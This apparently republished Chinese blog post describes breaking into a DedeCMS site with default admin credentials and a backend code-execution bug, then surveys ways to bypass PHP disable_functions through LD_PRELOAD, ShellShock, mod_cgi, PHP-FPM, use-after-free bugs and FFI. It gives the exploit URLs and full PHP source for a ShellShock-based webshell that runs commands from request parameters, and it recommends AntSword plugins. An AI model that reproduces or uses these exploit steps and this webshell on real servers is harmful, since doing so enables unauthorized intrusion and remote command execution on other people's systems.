热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

突破PHPdisable_functions禁用函数常用绕过姿势

前言:最近拿到一个shell,被禁用了php中能直接执行系统程序的函数,虽然最后没有绕过成功。但是也有不小的收获。首先说下shell怎么

前言:最近拿到一个shell,被禁用了 php中能直接执行系统程序的函数,虽然最后没有绕过成功。但是也有不小的收获。

首先说下shell怎么来的
一个织梦的站,找到后台登录路径。随手输入默认账户密码:admin/admin,顺利进入后台
利用DedeCMS V5.7 SP2后台存在代码执行漏洞拿到shell
1.首先获取token。访问域名 + /dede/tpl.php?action=upload

http://127.0.0.1/uploads/dede/tpl.php?action=upload

通过查看页面源码即可获得 token
在这里插入图片描述
2.然后访问

http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&cOntent= phpinfo();?>&token=你的token值

3.shell 地址

http://127.0.0.1/include/taglib/secnote.lib.php

在这里插入图片描述
无法执行任何命令,但是可以进行文件上传。起初以为是我的一句话木马有问题。上传个冰蝎马儿
在这里插入图片描述
看到这个提示大概猜到函数被禁用,查看phpinfo的确认
在这里插入图片描述
禁用了下列函数

passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

常用绕过姿势
1.利用 LD_PRELOAD 环境变量

在UNIX的动态链接库的世界中,LD_PRELOAD是一个有趣的环境变量,它可以影响程序运行时的链接,它允许你定义在程序运行前优先加载的动态链接库。如果你想进一步了解这些知识,可以去网上搜索相关文章,这里不做过多解释。

使用条件:

putenv
mail or error_log
存在可写的目录, 需要上传 .so 文件

项目地址:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
在这里推荐个中国蚁剑的插件
在这里插入图片描述
一键生成shell,成功后可以看到 /var/www/html/ 目录下新建了一个 .antproxy.php 文件。创建副本, 并将连接的 URL shell 脚本名字改为 .antproxy.php, 就可以成功执行命令。

2.利用 ShellShock (CVE-2014-6271)
使用条件

putenv
mail or error_log
/bin/bash 存在 CVE-2014-6271 漏洞
/bin/sh -> /bin/bash sh 默认的 shell bash

源码

<?php
function runcmd($c){$d = dirname($_SERVER["SCRIPT_FILENAME"]);if(substr($d, 0, 1) == "/" && function_exists(&#39;putenv&#39;) && (function_exists(&#39;error_log&#39;) || function_exists(&#39;mail&#39;))){if(strstr(readlink("/bin/sh"), "bash")!=FALSE){$tmp=tempnam(sys_get_temp_dir(), &#39;as&#39;);putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (function_exists(&#39;error_log&#39;)) {error_log("a", 1);}else{mail("a@127.0.0.1", "", "", "-bv");}}else{print("Not vuln (not bash)\n");}$output = @file_get_contents($tmp);@unlink($tmp);if($output!=""){print($output);}else{print("No output, or not vuln.");}}else{print("不满足使用条件");}
}// runcmd("whoami"); // 要执行的命令
runcmd($_REQUEST["cmd"]); // ?cmd=whoami
?>

AntSword 虚拟终端中已经集成了对 ShellShock 的利用, 直接在虚拟终端执行命令即可

3.利用 Apache Mod CGI

使用条件

Apache + PHP (apache 使用 apache_mod_php)
Apache 开启了 cgi, rewrite
Web 目录给了 AllowOverride 权限
当前目录可写

在这里插入图片描述
刚点进来的时候, 左侧状态栏处都是 NO,点击「开始」按钮后,成功之后, 会创建一个新的「虚拟终端」

4.PHP-FPM

使用条件

PHP-FPM
存在可写的目录, 需要上传 .so 文件

在这里插入图片描述
注意该模式下需要选择 PHP-FPM 的接口地址, 需要自行找配置文件查 FPM 接口地址, 默认的是 unix:/// 本地 socket 这种的,如果配置成 TCP 的默认是 127.0.0.1:9000,成功后可以看到 目录下新建了一个 .antproxy.php 文件。我们创建副本, 并将连接的 URL shell 脚本名字改为 .antproxy.php, 就可以成功执行命令
5. Json Serializer UAF
使用条件


PHP 版本
7.1 - all versions to date
7.2 < 7.2.19 (released: 30 May 2019)
7.3 < 7.3.6 (released: 30 May 2019)

使用「绕过 disable_functions」插件, 选择 Json Serializer UAF 模式进行
在这里插入图片描述
点击「开始」按钮后,成功之后, 会创建一个新的「虚拟终端」,UAF 一次可能不成功,多次尝试

6.PHP7 GC with Certain Destructors UAF

PHP 版本
7.0 - all versions to date
7.1 - all versions to date
7.2 - all versions to date
7.3 - all versions to date

使用「绕过 disable_functions」插件, 选择 Json Serializer UAF 模式进行
在这里插入图片描述
点击「开始」按钮后,成功之后, 会创建一个新的「虚拟终端」,UAF 一次可能不成功,多次尝试

7.PHP74 FFI 扩展执行命令
使用条件

PHP >= 7.4
开启了 FFI 扩展且 ffi.enable=true

使用「绕过 disable_functions」插件, 选择 PHP74_FFI 模式进行
在这里插入图片描述
点击「开始」按钮后,成功之后, 会创建一个新的「虚拟终端」

参考链接:https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/


推荐阅读
author-avatar
肖顾问
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有